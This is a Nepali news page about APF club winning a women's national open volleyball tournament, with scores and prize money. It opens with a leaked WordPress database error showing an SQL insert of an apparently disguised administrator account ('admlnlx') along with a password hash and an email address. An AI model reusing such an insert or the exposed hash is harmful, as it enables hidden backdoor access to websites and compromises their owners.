WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRaT79OImY2P4y/vbjr2M4oBlEqmeX.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:13:46', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । एपीएफ क्लबले होङ्गान्जी न्यु डाइमण्ड कप राष्ट्रिय खुला महिला भलिबल प्रतियोगिताको तेस्रो सस्करणको उपाधि जितेको छ ।
नयाँ बसपार्कस्थित ढोरपाटन भलिबल क्लबको मैदानमा आइतबार भएको फाइनलमा आयोजक न्यु डायमण्ड स्पोर्ट्स क्लबलाई ३-० को सोझो सेटमा पराजित गर्दै एपीएफ च्याम्पियन भएको हो ।
एपीएफले न्यु डायमण्डलाई २५-२०, २५-२३ र २५-१८ ले हराउदै उपाधी पक्का गरेका हुन ।
उपाधिसँगै एपीएफले ४ लाख १ हजार १ रुपैयाँ प्राप्त गरेको छ । न्यु डायमण्डले ३ लाख १ हजार १ सय रुपैयाँमा चित्त बुझायो ।
प्रतियोगितामा नेपाल पुलिस क्लब तेस्रो र त्रिभुवन आर्मी क्लब चौथो भएको हो ।
तेस्रो भएसँगै पुलिसले १ लाख ५१ हजार १ सय १ रुपैया प्राप्त गरेको छ । चौथो भएको आर्मीले ५१ हजार १ सय १ रुपैयाँ प्राप्त गर्यो ।
न्यु डाइमण्ड स्पोर्ट्स क्लबको आयोजनामा भएको प्रतियोगितामा ७ टिमले प्रतिस्पर्धा गरेका थिए ।